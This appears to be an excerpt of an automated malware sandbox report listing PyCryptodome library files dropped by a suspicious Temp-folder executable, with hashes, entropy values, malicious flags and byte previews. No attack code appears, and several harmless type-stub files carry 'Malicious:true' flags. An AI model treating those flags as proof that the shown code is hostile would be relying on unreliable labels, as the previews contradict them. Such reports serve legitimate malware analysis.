                                                                                                                                            Entropy (8bit):4.823438083026704
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYB0yqDLWJJni6Co6sRGcp5gUeQ/6sRGcp5/:1REYBkDyHZHRGe5VeQPRGe5/
                                                                                                                                            MD5:72AE5A92A5B5373240F3184324E84F6B
                                                                                                                                            SHA1:976AEA0ED87A3C086D068AE560FDB2FFCD591676
                                                                                                                                            SHA-256:ED464B7B39D2481D2C4DE1FF908308ADF7F035B21B3F7A242E469F1BD173DEF6
                                                                                                                                            SHA-512:27C15B7D76E180E1B65D566D8225C3661E78854515C9716A645C5F62E444B5A90AB61DDF92677B9C4A1276921711C281C814CAC60FA6D0BFC76A7716E4124613
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional....__all__ = [ 'pad', 'unpad' ]....def pad(data_to_pad: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: .....def unpad(padded_data: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: ...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\RFC1751.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):166
                                                                                                                                            Entropy (8bit):4.7074966574817525
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1REvgBoGvFbT/uopMLUXvcgEsbd7RC7L6yuCnhlxEmu5gv:1REYBDFbaoiCEsdsPVua5EP5gv
                                                                                                                                            MD5:0DE296D8A8547E04D6926C50733B2BE8
                                                                                                                                            SHA1:00E9FDFFF578A121326A68BDDAD8C135CEDAD52D
                                                                                                                                            SHA-256:76B2DA534877F2226EA2D41EC36651EA9B0344F541B7B127DD6C51994F90F2C5
                                                                                                                                            SHA-512:1E6630A95E807139497202AB681F9B77974C90723DFFDADD1E100B4802B0D677DD4D2A3AC65A8ECF700AC6E1CC8BB353C2EBFFBBEE0AFB1C6ACA4C0D78C72A9E
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Dict, List....binary: Dict[int, str]..wordlist: List[str]....def key_to_english(key: bytes) -> str: .....def english_to_key(s: str) -> bytes: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1201
                                                                                                                                            Entropy (8bit):4.97562846911311
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:INmlM4W2gRriTHvIqoFaTuYjVrGivBl02WRbgg:AmlzWb+LLYa5prGGBW2Weg
                                                                                                                                            MD5:10D93FB00D0B450C5FFA3C71E98F089A
                                                                                                                                            SHA1:02BB2C952DD2DA82E73161802E8CF8F18AA772A5
                                                                                                                                            SHA-256:47A2329E9C6912D451E2EFB32BD0401041522580880B1CC57A696475F48F3EF7
                                                                                                                                            SHA-512:458CA2C81941BA2840A3606AC47E2D22A635B71F980E9A2C232347685CF32B8865E7908CE6400381F9AF5083D84C8BA92B03195E6D4C015B85497CC51C4E7EEE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.Z.g.d...Z.d.S.).as...Miscellaneous modules..Contains useful modules that don't belong into any of the.other Cryptodome.* subpackages...======================== =============================================.Module Description.======================== =============================================.`Cryptodome.Util.number` Number-theoretic functions (primality testing, etc.).`Cryptodome.Util.Counter` Fast counter functions for CTR cipher modes..`Cryptodome.Util.RFC1751` Converts between 128-bit keys and human-readable. strings of words..`Cryptodome.Util.asn1` Minimal support for ASN.1 DER encoding.`Cryptodome.Util.Padding` Set of functions for adding and removing padding..======================== =============================================..:undocumented: _galois, _number_new, cpuid, py3compat, _raw_api.)...RFC1751..number..strxor..asn1..Counter..Paddin

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\_cpu_features.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):960
                                                                                                                                            Entropy (8bit):4.800630422402373
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:EJ/hnLH+UXiLiIFkrOS07ZOg/2IphJT8EZFtSlOWVleaPWOW3rLT:EpAiPrOSkYA2WRXb/MPs73
                                                                                                                                            MD5:DDA2412E526524EABAE5EEBA6547949D
                                                                                                                                            SHA1:CE9FA230C205CF5590564EF4472D619D7A338E2E
                                                                                                                                            SHA-256:6F92ABD98D083709148004D0C5490DB456EDEB574201F347A18A1E4715994E0D
                                                                                                                                            SHA-512:CE9456C85E4E7681C7649863CE63817007AE01EECE5C7491F38AB094C69EF5A99F146C30F6419EA3A74370424C8F07F9F2F5454B6BE951412052724D39A4FA8F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................6.....d.d.l.m.Z.....e.d.d...............Z.d...Z.d...Z.d.S.)......)...load_pycryptodome_raw_libz.Cryptodome.Util._cpuid_cz.. int have_aes_ni(void);. int have_clmul(void);. c.....................4.....t...............................................S...N)..._raw_cpuid_lib..have_aes_ni........qC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Cryptodome\Util\_cpu_features.pyr....r....)...s...........%..%..'..'..'r....c.....................4.....t...............................................S.r....).r......have_clmulr....r....r....r....r....-...s...........$..$..&..&..&r....N)...Cryptodome.Util._raw_apir....r....r....r....r....r....r......<module>r........s].........>..?..>..>..>..>..>....+..*.+E...,/....0....0......(....(....(....'....'....'....'....'r....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\_cpu_features.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):61
                                                                                                                                            Entropy (8bit):4.354688723015057
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:pAQybsRVLSyUkMFjRVLy:OdbsRnORQ
                                                                                                                                            MD5:2318A22B25D0854BD019BAEF901BB42A
                                                                                                                                            SHA1:37E3185DAACB1E611F02805F63044E28779DEFFF
                                                                                                                                            SHA-256:72FD9C4BBFF5954C58E3AE5C421334E7A570E5E8108DCB45499F8B497B359F5E
                                                                                                                                            SHA-512:B38E4BB47DF8EB1D8457D32BA047D2AB5278925854FEF51B8B922C9D0DC092DF19A1BCF9DF1F33CABD79583AC10D289F29A4E5A67B55B886D4282C5404767403
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:def have_aes_ni() -> int: .....def have_clmul() -> int: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\_cpuid_c.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10240
                                                                                                                                            Entropy (8bit):4.731194408014124
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:lJVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EVAElIijKDQGybMZYJWJcX6gbW6s:JVddiT7pgTctEEaEDKDuMCWJcqgbW6
                                                                                                                                            MD5:1547F8CB860AB6EA92B85D4C1B0209A1
                                                                                                                                            SHA1:C5AE217DEE073AC3D23C3BF72EE26D4C7515BD88
                                                                                                                                            SHA-256:1D2F3E627551753E58ED9A85F8D23716F03B51D8FB5394C4108EB1DC90DC9185
                                                                                                                                            SHA-512:40F0B46EE837E4568089D37709EF543A987411A17BDBAE93D8BA9F87804FB34DCA459A797629F34A5B3789B4D89BD46371AC4F00DDFE5D6B521DEA8DC2375115
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d...N..e.........." ...%............P........................................p............`..........................................'..|....'..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\_file_system.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1332
                                                                                                                                            Entropy (8bit):5.200498631480205
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:jjobn4Y5J/H0rCHBZ8Sl+AC8EGaOyrPEx2WRObhavkQGovvvE:XoLrE8ZBC4PyT42WgbhOkpovvvE
                                                                                                                                            MD5:F1AB0D76F3EEAB1EDBBD25ADC19BFA13
                                                                                                                                            SHA1:8478C2EBA3C2FF8162A125455EA6005EA8BFB38C
                                                                                                                                            SHA-256:1B1BDB56814D3F0BF2BE8418E5B93D77E246C99B3948F47ED7CD24FCA3BA6D24
                                                                                                                                            SHA-512:4AEAF1A1B063AEC6D9DC5FE4374881D63D7A338EF2556709A175B74E4C34B5C4B5DC17F5F92D82F03EB8A72B9AD68B32DC41C586F5FEF09E409477F56D2064CE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.d.l.Z.d...Z.d.S.)......Nc.....................d.....|.d...........d.k.....r.t...........d.................t...........|.d.d...........................|.g.z...}.t...........j...............................t...........j...............................t.......................................\...}.}.t...........j...............................|.d...............}.t...........j.........j.........|.g.|...R...S.).a....Return the complete file name for the module.. dir_comps : list of string. The list of directory names in the PyCryptodome package.. The first element must be "Cryptodome"... filename : string. The filename (inclusing extension) in the target directory.. r......Cryptodomez-Only available for modules under 'Cryptodome'.....Nz...)...ValueError..list..os..path..split..abspath..__file__..join)...dir_comps..filename..util_lib.._..root_libs.... .pC:\Users\Administrator\AppData\Local\Programs\Python\Python311

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\_file_system.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):103
                                                                                                                                            Entropy (8bit):4.5743153977203175
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1REvgBAWxXfcAiTMXtKIOcSkWtWemUL/:1REYB9xXkVM96nRWe1/
                                                                                                                                            MD5:FFE308959102B5607429CEF941E9560E
                                                                                                                                            SHA1:3DA8DA002FEBDA41FE88459082E6CD8E57B9A5B3
                                                                                                                                            SHA-256:2F8B0576992C17D8191119B78CF52F73540F11F2502360F71266F5FF848FB5B5
                                                                                                                                            SHA-512:35EE20412D0AC941F7368DAB82E4A4996DF4058981BA6C07B24E99D533C2BE38E65B8911A7E99EE03A370DF63B557DD3F77839CA10BE939C98BE3E14BB650C65
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import List......def pycryptodome_filename(dir_comps: List[str], filename: str) -> str: ...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\_raw_api.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14334
                                                                                                                                            Entropy (8bit):5.247449811324165
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:zZigdoN17fItDTvw/vlEVW5B6UVMmUtmKlTRxKmf9rZTSLI1wEOBPxeDN62i5lPU:NndoN1zsTvedBB6UGmUvzxHTSowESxzo
                                                                                                                                            MD5:803A4358384CEDBD6BF94BC36312E4B1
                                                                                                                                            SHA1:5C7A7739C60E3B7BEDC4E16D6F10832C97573C64
                                                                                                                                            SHA-256:D52357531149E4F67AB2BD59B4D6F00D2139AF2A7AEF4377455D21E14B99868D
                                                                                                                                            SHA-512:9C0284556A6DD3869D4B2E15F4D14F7AEB31257997A60EFA3D6237777147309CD5F0B515F6935DF8D5025CB44C50720CE8C0C030F08E0E225037FA768FCBB2EC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.*........................*.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.........d...........d.k.....r=d.d.l.Z.g.Z...e.j.......................D.]&\...Z.Z.Z.e.e.j.........k.....r.e.......................e..................'n.d.d.l.m.Z...e.j.........Z.e.e.f.Z...G.d...d.e...............Z...d.e.j.........v.r.e.j.........j.........d.k.....r...e.d.................e.j.........d.k.....r.e.j.........d.k.....r...e.d.................d.d.l.m.Z.....e...............Z.e.j ........Z!e.."....................e..#....................d.............................Z$e..#....................d...............j%........j&........Z'd...Z(d...Z)e)Z*e)Z+e)Z,d...Z-d/d...Z.d...Z/d...Z0d...Z1..G.d...d.e...............Z2d...Z3d.Z4n.#.e.$.r...d.d.l5Z5d.d.l5m6Z6m7Z7m8Z8m)Z)m*Z*m-Z-m.Z.m,Z,m+Z+..d.d.l9m:Z:..d.d.l5m;Z'..d.Z!g.Z<d...Z,d ..Z(d!..Z/d"..Z0e5j=........Z>d.Z?e5j@........jA........ZBe5j@........jC........ZDe5jE........ZF..e5jG........e>..............ZH..G.d#..d$e5jI......................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\_raw_api.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):933
                                                                                                                                            Entropy (8bit):4.777842095513583
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RExEeWw8O8GLziQDqwhBhhB+OTlAavvsZPWJuL:8EeTLPqkVv+PiE
                                                                                                                                            MD5:577B9FD6612492C13AAD9D5FDC396C43
                                                                                                                                            SHA1:2840A5AE5DA3ADA506BC9E64F4FB1324C021FCA7
                                                                                                                                            SHA-256:83C6B0310C82B4193830D59B3DABE23544ACF53FF2B53E0F918F2E8DB01F7485
                                                                                                                                            SHA-512:67E8794F498344EBEE1F95351169355EA139AE6937E867B7716E7A06ECEB3AE30F430630370BE7B06F325434041D9581DFA3831FFBF5F67FF7F88AE24C2935F0
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Any, Optional, Union....def load_lib(name: str, cdecl: str) -> Any : .....def c_ulong(x: int ) -> Any : .....def c_ulonglong(x: int ) -> Any : .....def c_size_t(x: int) -> Any : .....def create_string_buffer(init_or_size: Union[bytes,int], size: Optional[int]) -> Any : .....def get_c_string(c_string: Any) -> bytes : .....def get_raw_buffer(buf: Any) -> bytes : .....def c_uint8_ptr(data: Union[bytes, memoryview, bytearray]) -> Any : .......class VoidPointer(object):.. def get(self) -> Any : ..... def address_of(self) -> Any : .......class SmartPointer(object):.. def __init__(self, raw_pointer: Any, destructor: Any) -> None : ..... def get(self) -> Any : ..... def release(self) -> Any : .......backend : str..null_pointer : Any..ffi: Any....def load_pycryptodome_raw_lib(name: str, cdecl: str) -> Any : .....def is_buffer(x: Any) -> bool : .....def is_writeable_buffer(x: Any) -> bool : .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\_strxor.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10240
                                                                                                                                            Entropy (8bit):4.686131723746002
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:EiZVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EMz3DmWMoG4BcX6gbW6O:HVddiT7pgTctEEO3DcoHcqgbW6
                                                                                                                                            MD5:16F42DE194AAEFB2E3CDEE7FA63D2401
                                                                                                                                            SHA1:BE2AB72A90E0342457A9D13BE5B6B1984875EDEA
                                                                                                                                            SHA-256:61E23970B6CED494E11DC9DE9CB889C70B7FF7A5AFE5242BA8B29AA3DA7BC60E
                                                                                                                                            SHA-512:A671EA77BC8CA75AEDB26B73293B51B780E26D6B8046FE1B85AE12BC9CC8F1D2062F74DE79040AD44D259172F99781C7E774FE40768DC0A328BD82A48BF81489
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d...P..e.........." ...%............P........................................p............`.........................................`'..t....'..P....P.......@...............`..,...."...............................!..@............ ...............................text...x........................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\asn1.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3885
                                                                                                                                            Entropy (8bit):4.815634844501543
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:Acab6f+hGLbu31eXTTVkwB60oofRTOB+Jk2:AcjuJYTTVkS6IF6+m2
                                                                                                                                            MD5:1EFE3020CA61E0B1DA7B8680D73F84DA
                                                                                                                                            SHA1:D996C31812286881EB3D6E3FA28715095EC5587F
                                                                                                                                            SHA-256:4DB889724654605FF759C5B7D754174D13F71B3B621792E48AD0F9BE0CFCCC57
                                                                                                                                            SHA-512:12D48E230826E09437536FB35642F434E71D5C219A6B61FAF064B785CD09E131F7595AC7DBE1A359C81B23DC24B3436F6AFDF9CE7EBD6961EBEDAF23F5F81F28
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional, Sequence, Union, Set, Iterable....__all__ = ['DerObject', 'DerInteger', 'DerOctetString', 'DerNull',.. 'DerSequence', 'DerObjectId', 'DerBitString', 'DerSetOf']....# TODO: Make the encoded DerObjects their own type, so that DerSequence and..# DerSetOf can check their contents better....class BytesIO_EOF:.. def __init__(self, initial_bytes: bytes) -> None: ..... def set_bookmark(self) -> None: ..... def data_since_bookmark(self) -> bytes: ..... def remaining_data(self) -> int: ..... def read(self, length: int) -> bytes: ..... def read_byte(self) -> bytes: .......class DerObject:.. payload: bytes.. def __init__(self, asn1Id: Optional[int]=None, payload: Optional[bytes]=..., implicit: Optional[int]=None,.. constructed: Optional[bool]=False, explicit: Optional[int]=None) -> None: ..... def encode(self) -> bytes: ..... def decode(self, der_encoded: bytes, strict: bool=...) -> DerObject: .......class DerInte

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\number.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):67228
                                                                                                                                            Entropy (8bit):5.28813757547964
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:89kNqUkWZjyUy0lwXEgNjOtg78YrIn6VhjlLQ5DR4wLDzwK2csHXZ:8RwpyUy0lsEgZOtg78sI6VTLQ5DRvvz8
                                                                                                                                            MD5:50DC82BBBF96F3A8A270EFA0B831D765
                                                                                                                                            SHA1:C1D82E78CABBEAB45605A44EC265B84D9AB5B04C
                                                                                                                                            SHA-256:2FF41892F47D91B87291CFEF24517119C5AAC5CA0A8BD201EB6986BD8B22629D
                                                                                                                                            SHA-512:9B79B574988000392126BDC152FE45A7B0BB8E884529D62D145EB6949C1FF7FA365F343391B431835D1BED2ACFF551A59B5957F4FD6BA118CBF6AD9B25D74418
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.~..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d...Z.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.........d.d.............d.k.....r.e.j.........Z.n.d...Z.e.j.........d.d.............d.k.....r.d...Z.n.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.l.Z.d.d...Z.d...Z.d.d.l.Z.d.d...Z.d...Z.d.Z.d.S.)......N)...Random)...iter_rangec..........................|.d.k.....r.t...........................|.d.k.....s.|.d.k.....r.t...........d.................t...........|.|...............\...}.}.|.d.k.....r.|.d.k.....r.|.d.z...}.|.S.).zDReturn ceil(n/d), that is, the smallest integer r such that r*d >= nr....z.Non positive values.....)...ZeroDivisionError..ValueError..divmod)...n..d..r..qs.... .jC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Cryptodome\Util\number.py..ceil_divr....%...si...........A.v.v.....!..!..!....A.....1.q.5.5......../../../....!.Q.<.<.D.A.q....Q.....Q.!.V.V....Q........H.....c.....................T.....|.d.k

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\number.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):994
                                                                                                                                            Entropy (8bit):4.898132103946567
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RE0x1JCvE59p+vE59eE59iLdUKhGnE597pcSpShFE59cSpShFE5vUyrfunVshdU:bxX7Z+crYnJescsje
                                                                                                                                            MD5:81227B5A65D7EF13CB0247C9B7225673
                                                                                                                                            SHA1:8954A181B5E8D7B31145E5C139935B9780E4D1EB
                                                                                                                                            SHA-256:6BD67E3A908997245FB373BC1C4971BAC0CFDD5FC17D4B7CDBD3F51AD6774AF1
                                                                                                                                            SHA-512:12F42616F440853BF94758392116879BE87073F515AE0C33454BFAC2D80140DE0FCC0469E34D8E06B42436A3EDEF4B5BE8D0E7C5EFCE413CE0F89041556CCA59
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import List, Optional, Callable......def ceil_div(n: int, d: int) -> int: .....def size (N: int) -> int: .....def getRandomInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomRange(a: int, b: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomNBitInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def GCD(x: int,y: int) -> int: .....def inverse(u: int, v: int) -> int: .....def getPrime(N: int, randfunc: Optional[Callable]=None) -> int: .....def getStrongPrime(N: int, e: Optional[int]=0, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> int: .....def isPrime(N: int, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> bool: .....def long_to_bytes(n: int, blocksize: Optional[int]=0) -> bytes: .....def bytes_to_long(s: bytes) -> int: .....def long2str(n: int, blocksize: Optional[int]=0) -> bytes: .....def str2long(s: bytes) -> int: .......sieve_base: List[int]..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\py3compat.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8022
                                                                                                                                            Entropy (8bit):4.932859039913864
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:godTTOBYDLOjIWTjpSaRBF7mxz7jdDpD6erboFpX8j64rkX202m5PDpAa9DGZ/Ef:goMqUI182NvJ0H4rTO5PFJ5G+TyzWWY
                                                                                                                                            MD5:B656DB916768B23EF5F82F0171DB08B5
                                                                                                                                            SHA1:B8C7022F62C31CF389C2739FFA1A572EB8BDBCEF
                                                                                                                                            SHA-256:6591B7D68A2B60048A4D67DB11C0E629A729319E5DD3D479B3045959D1B5FCA2
                                                                                                                                            SHA-512:4F06FE878FAED8FCB871A0B478645087F1D5912E16D55F5182E5E0DFA4F548F116522E7A4E485BA36E0DE222E8FEA03D862976971A61D60B1007A39D0560FD13
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e~.........................V.....d.Z.d.d.l.Z.d.d.l.Z.e.j.........d...........d.k.....rJd...Z.d...Z.d...Z.d...Z.d$d...Z.d...Z.d...Z.d...Z.d.d.l.m.Z...e.Z.d.d.l.m.Z...e.Z.d...Z.d...Z.d...Z...e.j.........d.e.f.d.d.i...............Z.e.Z.n>d...Z.d...Z.d...Z.d...Z.d$d...Z.d...Z.d...Z.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.Z.d...Z.d ..Z.d!..Z.d.d"l.m.Z...e.Z.d#..Z.[.[.d.S.)%a....Compatibility code for handling string/bytes changes from Python 2.x to Py3k..In Python 2.x, strings (of type ''str'') contain binary data, including encoded.Unicode text (e.g. UTF-8). The separate type ''unicode'' holds Unicode text..Unicode literals are specified via the u'...' prefix. Indexing or slicing.either type always produces a string of the same type as the original..Data read from a file is always of '''str'' type...In Python 3.x, strings (type ''str'') may only contain Unicode text. The u'...'.prefix and the ''unicode'' type are now redundant. A new type (called.''bytes'') has to be used

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\py3compat.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):870
                                                                                                                                            Entropy (8bit):4.791491758318878
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REgT3JtgPnrnIW9h3MnBbRFNU+U4Fu31954iEe1oHhASLjPMQ:pZtgMcUTkDTtoBjLt
                                                                                                                                            MD5:E7EC097AA59EF78A17CCA1860BE69741
                                                                                                                                            SHA1:A25E52635BA19E8324128B8900378458BDAA3AF2
                                                                                                                                            SHA-256:A1913976F178C28B8A7C117093233AAC0D3E772C4876DA9C084382BB95F2AC2D
                                                                                                                                            SHA-512:675F6249EF76BDA58D64ABF2BEB84DA58C04A4054F380BC3C2D63CA0D0CAB3342FB36A43925C6176D494F70AC1AEFD06DDB809F28F4A3412E857ACA1F42E6451
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Any, Optional, IO....Buffer = Union[bytes, bytearray, memoryview]....import sys....def b(s: str) -> bytes: .....def bchr(s: int) -> bytes: .....def bord(s: bytes) -> int: .....def tobytes(s: Union[bytes, str]) -> bytes: .....def tostr(b: bytes) -> str: .....def bytestring(x: Any) -> bool: .......def is_native_int(s: Any) -> bool: .....def is_string(x: Any) -> bool: .....def is_bytes(x: Any) -> bool: .......def BytesIO(b: bytes) -> IO[bytes]: .....def StringIO(s: str) -> IO[str]: .......if sys.version_info[0] == 2:.. from sys import maxint.. iter_range = xrange....else:.. from sys import maxsize as maxint.. iter_range = range....class FileNotFoundError:.. def __init__(self, err: int, msg: str, filename: str) -> None:.. pass....def _copy_bytes(start: Optional[int], end: Optional[int], seq: Buffer) -> bytes: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\strxor.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4853
                                                                                                                                            Entropy (8bit):5.18519449738067
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:KDdkv/U9DpsEJwyJfT/nIlvhuz/Z6L0xNWXwyHc:KiiP7wFhUu0L+w4c
                                                                                                                                            MD5:309A4BFEFF0E59F0C991E69674756554
                                                                                                                                            SHA1:F652252CC561A2D4B93E0F689CEC9D475F896542
                                                                                                                                            SHA-256:2E0519718E983D2F1CC210ED7726924B2EB33DC2CB5438C5598A9511294D428D
                                                                                                                                            SHA-512:EB602DEFA2D8627ED9251445F6225675AB3694DD1811B6D3357256212227B3BB90CB7C998B73C614CABBA82D4F5F8654E0408DD769B2CA8CF61A20F173EB1F05
                                                                                                                                            Malicious:false
